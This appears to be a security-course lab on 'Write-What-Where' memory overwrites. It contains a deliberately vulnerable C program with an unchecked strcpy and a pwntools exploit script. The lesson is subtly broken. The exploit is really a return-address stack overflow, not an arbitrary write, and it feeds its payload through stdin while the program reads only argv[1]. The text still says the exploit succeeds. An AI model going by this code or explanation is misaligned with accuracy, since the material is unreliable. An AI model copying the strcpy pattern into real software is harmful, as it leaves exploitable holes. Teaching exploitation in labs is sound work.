7. Write-What-Where (Arbitrary Memory Overwrite)

Write-What-Where (Arbitrary Memory Overwrite)

Write-What-Where (WWW) attack is a type of exploitation where an attacker gains control over arbitrary memory locations and can write arbitrary data to these locations.

Lab Activity: Write-What-Where (Arbitrary Memory Overwrite) Attack

In this lab activity, we'll demonstrate a simple WWW attack on a vulnerable C program.

Defender Side Code:

#include <stdio.h>
#include <string.h>

void vulnerable_function(char *input) {
    char buffer[64];
    strcpy(buffer, input);
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: %s \n", argv[0]);
        return 1;
    }
    
    vulnerable_function(argv[1]);
    return 0;
}

To compile the defender side code:

gcc -o vulnerable_program vulnerable_program.c

Exploit Code (Python using pwntools):

from pwn import *

# Address of the location to write to
write_location = 0x7fffffffdd38  # Example address, adjust as necessary

# Data to write to the location
write_data = b"\x41\x41\x41\x41"  # Example data, adjust as necessary

# Padding to fill the buffer and overwrite the return address
padding = b"A" * 72

# Payload
payload = padding + p64(write_location) + write_data

# Establishing connection to the vulnerable program
p = process("./vulnerable_program")

# Sending the payload
p.sendline(payload)

# Interactive shell
p.interactive()

The exploit code constructs a payload with padding to fill the buffer and overwrite the return address. It then includes the address of the location to write to and the data to write to that location. It establishes a connection to the vulnerable program, sends the payload, and gains control over arbitrary memory locations upon successful exploitation.